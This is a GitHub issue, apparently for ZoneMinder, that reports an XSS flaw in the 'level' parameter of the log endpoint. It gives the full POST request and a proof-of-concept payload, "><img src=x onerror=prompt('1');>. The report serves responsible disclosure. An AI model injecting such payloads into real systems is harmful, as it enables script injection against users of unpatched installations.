We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Describe Your Environment
Describe the bug The parameter value level, is displayed insecurely, without applying any proper output filtration leading to XSS
level
To Reproduce Affected URL : http://localhost/zm/index.php
POST Data - browser[name]=chrome&browser[platform]=win&browser[version]=41&file=http://localhost/zm/?filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query] [terms][0][val]=19&level="><img src=x onerror=prompt('1');>&line=128&message=ReferenceError: Can't find variable: createPopup&page=1&request=log&task=create&view=events&view=request
browser[name]=chrome&browser[platform]=win&browser[version]=41&file=http://localhost/zm/?filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query] [terms][0][val]=19&level="><img src=x onerror=prompt('1');>&line=128&message=ReferenceError: Can't find variable: createPopup&page=1&request=log&task=create&view=events&view=request
Payload used - "><img src=x onerror=prompt('1');>
"><img src=x onerror=prompt('1');>
Expected behavior
Debug Logs
None
The text was updated successfully, but these errors were encountered:
c9d597d
No branches or pull requests
Describe Your Environment
Describe the bug
The parameter value
level
, is displayed insecurely, without applying any proper output filtration leading to XSSTo Reproduce
Affected URL :
http://localhost/zm/index.php
POST Data -
browser[name]=chrome&browser[platform]=win&browser[version]=41&file=http://localhost/zm/?filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query] [terms][0][val]=19&level="><img src=x onerror=prompt('1');>&line=128&message=ReferenceError: Can't find variable: createPopup&page=1&request=log&task=create&view=events&view=request
Payload used -
"><img src=x onerror=prompt('1');>
Expected behavior
Debug Logs
The text was updated successfully, but these errors were encountered: